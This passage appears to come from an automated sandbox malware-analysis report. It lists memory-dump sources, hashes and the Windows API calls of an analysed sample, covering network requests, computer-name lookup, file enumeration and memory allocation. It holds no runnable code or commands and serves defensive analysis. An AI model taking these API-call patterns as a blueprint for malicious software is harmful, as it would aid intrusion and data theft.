                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InternetOpen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2038078732-0
                                                                                                                                                                                                                      • Opcode ID: 5a2dae33c1122239a1467a38b4929007afad54bd86b24ca38b5b100568cd55b3
                                                                                                                                                                                                                      • Instruction ID: d799e9cda3f15cb694ab0866f120829321f9a12d57094e41915ee2447f8f2554
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a2dae33c1122239a1467a38b4929007afad54bd86b24ca38b5b100568cd55b3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C321A131A102188FCB00EFA8DC80E9A77F5FF8C304B148128E95597322FBB0A906CF95

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 139 418160-418182 InternetCloseHandle 140 418185 139->140
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InternetCloseHandle.WININET ref: 00418166
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandleInternet
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1081599783-0
                                                                                                                                                                                                                      • Opcode ID: 344a25893a46580cdbb853dae8e3f6e82f140c582bf9eaf235203a2b7d6ff21c
                                                                                                                                                                                                                      • Instruction ID: ae5e315c54a7670b2249e5b0f3bdf6a6f2b00f65773975af1cbbced8fcde3caa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 344a25893a46580cdbb853dae8e3f6e82f140c582bf9eaf235203a2b7d6ff21c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7601FB36B0522DDFDB00EF98EC80E9A73B4FF58218B114465E92597321EBB0AA16CF55

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 146 417f58-417fa2 HttpSendRequestA 148 417fa9-417fcb 146->148
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HttpRequestSend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 360639707-0
                                                                                                                                                                                                                      • Opcode ID: 640d22e51ea26dd4110a4910ea00f1bfb3b3238f2ad13e7a3fa7d490065beb0a
                                                                                                                                                                                                                      • Instruction ID: c5f7f24f37b68b0ee58fd2f50e06334a253e74aa66ac9acfdd0b5a5957e02501
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 640d22e51ea26dd4110a4910ea00f1bfb3b3238f2ad13e7a3fa7d490065beb0a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2601A470A102199FE760EF68DC84F5637B8AB8C700F01467CF715E72E2EAB09841CB15

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 149 431480-4314c6 GetComputerNameA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(00000000), ref: 004314B3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                                                                      • Opcode ID: 8f8eb795359fb0aa2d749ee19533a4635df463a2ca35125aa3eba5b7db898b85
                                                                                                                                                                                                                      • Instruction ID: fbecf42e50bf32649b0f86ce1194af764c2ba67d61e8489f1122926f9e73325e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f8eb795359fb0aa2d749ee19533a4635df463a2ca35125aa3eba5b7db898b85
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84E06DB17021006FDB58DF2DDCD5F6B72ED9BC9254B0A4028F804D7361EA74AC10C669

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 155 4010c6-40110d VirtualAllocExNuma
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0043E8BB), ref: 004010F7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocNumaVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4233825816-0
                                                                                                                                                                                                                      • Opcode ID: bb8c22882e4e6801e3f93027a8384a536ab1f92f41c5be2d295d4875465a3d3e
                                                                                                                                                                                                                      • Instruction ID: d15b9f596ca57768b7915b5c70adcfe063bff0d2da7a8f47b6d44be3499abacb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb8c22882e4e6801e3f93027a8384a536ab1f92f41c5be2d295d4875465a3d3e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FE09275A063508FD704FF7CDD8175933E0AF85605F05915CD884A7366EB30A99487C5

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 157 417e16-417e67 InternetConnectA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConnectInternet
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3050416762-0
                                                                                                                                                                                                                      • Opcode ID: d8bdd812af22da76226ce8ec8597369cd6329b795b9649a49ea347b5d7ed01be
                                                                                                                                                                                                                      • Instruction ID: 39c588309585c59699f010394ec1bf5a852f07e64b85a41ba6658fda9e5a6e49
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8bdd812af22da76226ce8ec8597369cd6329b795b9649a49ea347b5d7ed01be
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51F01C709097128FE314DF69D48066AB7F1BFC4646F14C62DE49497325EB709492CB46
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                      • Opcode ID: fe00cb662a54cc21d0244e1f803d6a7692d16ee3833788be0c8e0b1dc36feb0e
                                                                                                                                                                                                                      • Instruction ID: cf296a1a1b11250edfbb2069b8a98eb1549536c670596b1f21556aec9cf299b1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe00cb662a54cc21d0244e1f803d6a7692d16ee3833788be0c8e0b1dc36feb0e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6F04477A00519DBCB00DF94EC9189877B4FF88320B058155ED05DB355E6B4AE15CB96
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                      • Opcode ID: 413ab2c401dedeffab42e718f703c10fdbd730e0357086002033bdee9966fac6
                                                                                                                                                                                                                      • Instruction ID: fde5f217f82ebe29c984b4a8bf476fe36905b452798d5d1b4171e59d2cf25e0a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 413ab2c401dedeffab42e718f703c10fdbd730e0357086002033bdee9966fac6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BE02232E453642BE214AB7CCC4896777DAAF85244B098628E840CB322FA21EE40C2C4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1586166983-0
                                                                                                                                                                                                                      • Opcode ID: 686e4aad7f854b1a44dbe84834961a502191f8a2d24db8f6ecc6bb64ecf4b79e
                                                                                                                                                                                                                      • Instruction ID: 0df1f5f79d30fcabe98c6cb3613603f4b5a0cecef6749fcbca2d7a1ce428ac3c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 686e4aad7f854b1a44dbe84834961a502191f8a2d24db8f6ecc6bb64ecf4b79e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35D092317043158FC744CF59ECC4A8A77A6AF896163189568E009CB22ADA31ED92CA88
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 0041E42B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                      • API String ID: 1974802433-4000257214
                                                                                                                                                                                                                      • Opcode ID: 0a7e237ab8405aa26ad94c92d791244eac69c99f0dc965387448d2bddcaf2b07
                                                                                                                                                                                                                      • Instruction ID: 444d2139b4423df7e404c14bc0898a50738c756d6f3279185a54cc7c24eee840
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a7e237ab8405aa26ad94c92d791244eac69c99f0dc965387448d2bddcaf2b07
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A2162B67001549FC704DF6CDDE0EA933B9EBC9604B084168E915E3362E6B4AE14CB59
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 00420455
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                      • Opcode ID: d47b22d7c2b5d8854116b83036bc1483b5f8cda757cbb595c16f5e01f296aa4b
                                                                                                                                                                                                                      • Instruction ID: 09395c8a0eafa750aeaa3e373b0b01c6308d5a6badcce2baeb186db3cbc76868
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d47b22d7c2b5d8854116b83036bc1483b5f8cda757cbb595c16f5e01f296aa4b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5314BB5702954AFD700DFACEC98E5D7BE5FF98300B044068E859D7361EAB8AE058B45
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 00424A63
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
